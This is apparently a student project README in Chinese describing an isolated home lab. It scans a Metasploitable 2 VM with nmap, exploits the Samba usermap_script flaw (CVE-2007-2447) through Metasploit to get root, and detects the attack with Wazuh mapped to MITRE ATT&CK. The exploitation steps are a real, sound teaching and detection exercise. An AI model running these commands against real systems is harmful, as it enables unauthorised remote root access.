隔离的 AD/Linux 攻击实验室:通过 Metasploit 利用 CVE-2007-2447,使用 Wazuh SIEM 检测并映射至 MITRE ATT&CK(T1190、T1059)
B.Tech 项目(BTP)| IIIT Pune 基于:《为检测与监控设计和实现有效的网络安全家庭实验室》 — ICCCNT 2023,IIT Delhi
一个基于单台机器、使用免费开源工具构建的功能完整的网络安全家庭实验室。该实验室模拟真实世界的攻击生命周期——侦察 → 利用 → 检测——并演示 SIEM 如何实时检测攻击并将其映射到 MITRE ATT&CK 框架。
┌─────────────────────────────────────────────────┐
│ VirtualBox — Internal Network │
│ (cyberlab, 10.0.0.x/24) │
│ │
│ ┌──────────┐ ┌──────────────┐ ┌──────────┐ │
│ │ Kali │ │ Metasploitable│ │ Ubuntu │ │
│ │ 10.0.0.1 │◄─►│ 10.0.0.2 │◄─►│ 10.0.0.3 │ │
│ │ ATTACKER │ │ VICTIM │ │ SIEM │ │
│ └──────────┘ └──────────────┘ └──────────┘ │
└─────────────────────────────────────────────────┘
Host-Only Adapter (192.168.56.103)
→ Wazuh Dashboard access from browser
| 虚拟机 | 角色 | IP | 工具 |
|---|---|---|---|
| Kali Linux 2026.1 | 攻击者 | 10.0.0.1 | Nmap、Metasploit |
| Metasploitable 2 | 受害者 | 10.0.0.2 | 20+ 个漏洞 |
| Ubuntu 22.04 + Wazuh | SIEM | 10.0.0.3 | Wazuh v4.7.5 |
在 VirtualBox 中创建一个名为 cyberlab 的内部网络。三台虚拟机均使用该适配器。Ubuntu/Wazuh 虚拟机额外配置一个仅主机适配器,以便从浏览器访问仪表板。
cyberlab 内部网络适配器# Edit /etc/network/interfaces
auto eth0
iface eth0 inet static
address 10.0.0.1
netmask 255.255.255.0
sudo systemctl restart networkingcyberlab 网络# Edit /etc/network/interfaces
auto eth0
iface eth0 inet static
address 10.0.0.2
netmask 255.255.255.0
⚠️ 切勿将 Metasploitable 2 暴露到互联网。 它本身就存在严重的安全漏洞。
cyberlab 内部网络 + 仅主机适配器/etc/netplan/01-network-manager-all.yaml):network:
version: 2
renderer: NetworkManager
ethernets:
enp0s3:
addresses:
- 10.0.0.3/24
enp0s8:
dhcp4: true
curl -sO https://packages.wazuh.com/4.7/wazuh-install.sh
sudo bash wazuh-install.sh -a
https://192.168.56.103(从宿主机浏览器)由于 Metasploitable 2 无法运行 Wazuh 代理,请配置 syslog 转发 以实现无代理监控:
在 Metasploitable 上,将以下内容添加到 /etc/rsyslog.conf:
*.* @10.0.0.3:514
在 Wazuh(Ubuntu)上,在 /var/ossec/etc/ossec.conf 中启用 syslog 输入:
<remote>
<connection>syslog</connection>
<port>514</port>
<protocol>udp</protocol>
</remote>
重启 Wazuh:sudo systemctl restart wazuh-manager
# From Kali
nmap -sV -O 10.0.0.2
在 Metasploitable 2 上发现的关键服务:
发现 20+ 个开放端口。操作系统指纹识别:Linux 2.6.x
漏洞: CVE-2007-2447 — Samba usermap_script 命令注入
允许未认证攻击者通过向 Samba 3.0.0–3.0.25rc3 发送畸形 MS-RPC 请求来执行远程代码。
# From Kali — launch Metasploit
msfconsole
# Inside Metasploit
use exploit/multi/samba/usermap_script
set RHOSTS 10.0.0.2
set LHOST 10.0.0.1
run
# Verify root access
whoami
# Output: root
利用成功后,Wazuh 自动检测事件并将其映射到 MITRE ATT&CK:
检测到的事件总数:55+
访问仪表板 https://192.168.56.103 → 安全事件 → MITRE ATT&CK
cybersecurity-home-lab/
│
├── README.md ← You are here
├── network-config/
│ ├── kali-interfaces.txt ← Kali static IP config
│ ├── metasploitable-interfaces.txt
│ └── ubuntu-netplan.yaml ← Ubuntu/SIEM netplan config
├── wazuh-config/
│ └── ossec.conf ← Wazuh syslog/agent config
├── screenshots/
│ ├── nmap-scan.png
│ ├── metasploit-exploit.png
│ ├── wazuh-dashboard.png
│ └── wazuh-alerts-table.png
└── report/
└── ICCCNT_2023_paper.pdf ← Reference research paper
Dadiyala, C. 等人(2023)。《为检测与监控设计和实现有效的网络安全家庭实验室》。 第 14 届国际计算、通信与网络技术会议(ICCCNT),IIT Delhi。IEEE-56998。
本实验室完全构建于隔离的虚拟机上,攻击模拟期间不连接互联网。所有工具和技术仅用于受控环境中的教育目的。请勿在您不拥有或未经明确授权测试的系统上尝试复现任何攻击技术。
由 Harshita Verma 呈现 | IIIT Pune
| 工具 | 版本 | 用途 |
|---|
| VirtualBox | 7.x | 虚拟机监控程序——在一台主机上运行所有虚拟机 |
| Kali Linux | 2026.1 | 渗透测试操作系统(攻击性) |
| Metasploitable 2 | v2.0 | 故意留有漏洞的攻击目标 |
| Wazuh | v4.7.5 | 开源 SIEM(防御性) |
| Nmap | 最新版 | 网络/端口扫描 |
| Metasploit Framework | 最新版 | 漏洞利用框架 |
| 端口 | 服务 | 版本 |
|---|
| 21/tcp | FTP | vsftpd 2.3.4 |
| 22/tcp | SSH | OpenSSH 4.7p1 |
| 80/tcp | HTTP | Apache 2.2.8 |
| 139/445 | SMB | Samba 3.x–4.x |
| 3306/tcp | MySQL | 5.0.51a |
| 5432/tcp | PostgreSQL | 8.3 |
| 规则 ID | 描述 | MITRE 技术 | 战术 |
|---|
| 5402 | 成功执行 sudo 切换至 ROOT | T1548.003 | 权限提升 |
| 5501 | PAM:登录会话已打开 | T1078 | 初始访问 / 持久化 |
| 5502 | PAM:登录会话已关闭 | T1078 | 防御规避 |
| 502 | Wazuh 服务器已启动 | — | 检测活跃 |